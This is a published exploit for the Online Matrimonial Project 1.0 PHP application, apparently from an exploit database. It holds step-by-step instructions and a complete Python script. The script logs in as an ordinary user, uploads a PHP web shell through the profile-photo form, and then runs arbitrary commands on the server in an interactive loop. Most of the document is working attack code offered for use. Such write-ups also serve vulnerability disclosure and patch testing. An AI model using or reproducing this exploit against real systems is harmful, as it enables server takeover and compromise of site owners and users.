Authored by Valerio Alessandroni

Online Matrimonial Project version 1.0 authenticated remote code execution exploit.

# Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
# Exploit Author: Valerio Alessandroni
# Date: 2020-10-07
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/
# Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php
# Version: 1.0
# Tested On: Server Linux Ubuntu 18.04, Apache2
# Version: Python 2.x
# Impact: Code Execution
# Affected components: Affected move_uploaded_file() function in functions.php file.
# Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
# Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed.
#
# Additional information:
#
# To exploit this vulnerability:
# 1) register a not privileged user at /register.php
# 2) login in the application /login.php
# 3) keep note of the redirect with the GET 'id' parameter  /userhome.php?id=[ID]
# 4) go to the page /photouploader.php?id=[ID]
# 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "<?php system($_GET['cmd']); ?>"
# 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php
# 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND]
#
# How to use it:
# python exploit.py [URL] [USERNAME] [PASSWORD]


import requests, sys, urllib, re, time
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def webshell(SERVER_URL, ID, FILE_NAME):
    try:
        print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...')
        time.sleep(1)
        WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME
        getCMD  = {'cmd': 'echo ciao'}
        r2 = requests.get(WEB_SHELL, params=getCMD)
        status = r2.status_code
        if status != 200:
            print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        while True:

             inputCMD = raw_input('$ ')
             command = {'cmd': inputCMD}
             r2 = requests.get(WEB_SHELL, params=command, verify=False)
             print r2.text
    except:
        print("rnExiting.")
        sys.exit(-1)

def printHeader():
     print(Fore.GREEN+"___  ___              _  _          _ "+Fore.RED+"     ______  _____  _____")
     print(Fore.GREEN+"|  /  |             (_)| |        | |"+Fore.RED+"     | ___ /  __ |  ___|")
     print(Fore.GREEN+"| .  . |  __ _  _ __  _ | |_  __ _ | |"+Fore.RED+"     | |_/ /| /  /| |__  ")
     print(Fore.GREEN+"| |/| | / _` || '__|| || __|/ _` || |"+Fore.RED+"     |    / | |    |  __| ")
     print(Fore.GREEN+"| |  | || (_| || |   | || |_| (_| || |"+Fore.RED+"     | |  | __/| |___ ")
     print(Fore.GREEN+"_|  |_/ __,_||_|   |_| __|__,_||_|"+Fore.RED+"     _| _| ____/____/ ")
     print ''                                                       



if __name__ == "__main__":
    printHeader()
    if len(sys.argv) != 4:
        print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0])
        print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0])
        sys.exit(-1)
    SERVER_URL = sys.argv[1]
    SERVER_URI = SERVER_URL + 'auth/auth.php'
    LOGIN_PARAMS = {'user': '1'}
    LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
    req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False)
    print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...')
    time.sleep(1)
    for resp in req.history:
        COOKIES = resp.cookies.get_dict()
        SPLITTED = resp.headers["location"].split("=")
        ID = SPLITTED[1]
    print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].')
    time.sleep(1)
    SERVER_URI = SERVER_URL + 'photouploader.php'
    LOGIN_PARAMS = {'id': ID}
    LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
    FILE_NAME = 'shell.php'
    FILES = {'pic1': (FILE_NAME, '<?php system($_GET['cmd']); ?>'), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')}
    req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False)
    print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.')
    time.sleep(1)
    webshell(SERVER_URL, ID, FILE_NAME)

RELATED ARTICLESMORE FROM AUTHOR